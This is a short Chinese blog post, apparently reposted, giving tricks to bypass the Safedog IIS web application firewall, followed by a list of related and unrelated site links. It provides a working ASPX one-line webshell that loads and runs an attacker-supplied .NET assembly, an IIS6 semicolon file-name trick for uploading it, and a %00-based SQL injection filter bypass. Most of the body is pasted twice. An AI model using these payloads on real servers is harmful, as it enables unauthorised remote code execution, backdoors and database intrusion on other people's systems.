突破安全狗的一些记录
来源:互联网 发布:周立功单片机教程 编辑:程序博客网 时间:2024/05/16 16:56
1、绕过IIS安全狗的一句话。
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
文件名为http://www.2cto.com /1.asp;1.jpg。
这样的会被IIS安全狗果断屏蔽。
改成如下名称,IIS6一样会解析:
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但如果:
seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
连接端用cncert的aspx一句话客户端。
文件名为http://www.2cto.com /1.asp;1.jpg。
这样的会被IIS安全狗果断屏蔽。
改成如下名称,IIS6一样会解析:
http://www.2cto.com /;1.asp;1.jpg
常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但如果:
seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了
- 突破安全狗的一些记录
- 突破安全狗的一些记录
- 突破安全狗的一些记录
- 可突破安全狗的aspx一句话
- 突破安全狗
- 关于线程安全的一些记录
- 突破安全狗上传文件
- 突破CND的一些方法
- 白帽子讲安全 的一些记录点
- 白帽子讲安全 的一些记录点
- 记录一下一些服务器的安全配置(随时更新)
- 安全狗iis 6.0 ; 截断解析突破
- 突破安全狗和360网站卫士
- nginx 的一些优化(突破十万并发)
- Nginx的一些优化(突破十万并发)
- 突破 BTrace 安全限制
- 研究人员突破了Windows RT的安全系统
- 安全的一些经验
- js数组的操作
- Cstring与double char 的转换
- 【Android】利用服务Service创建标题栏通知
- MyEclipse6.5+SVN配置与使用
- nginx push模块
- 突破安全狗的一些记录
- ganglia结构和安装
- 北京生娃笔记
- Nginx实践:用memcached模块加速PHP应用程序
- jsp form get方式传递参数乱码
- strlen与sizeof的区别
- 起点!
- 数字图像处理基础(翻译一)
- Plus One 十进制数加一@LeetCode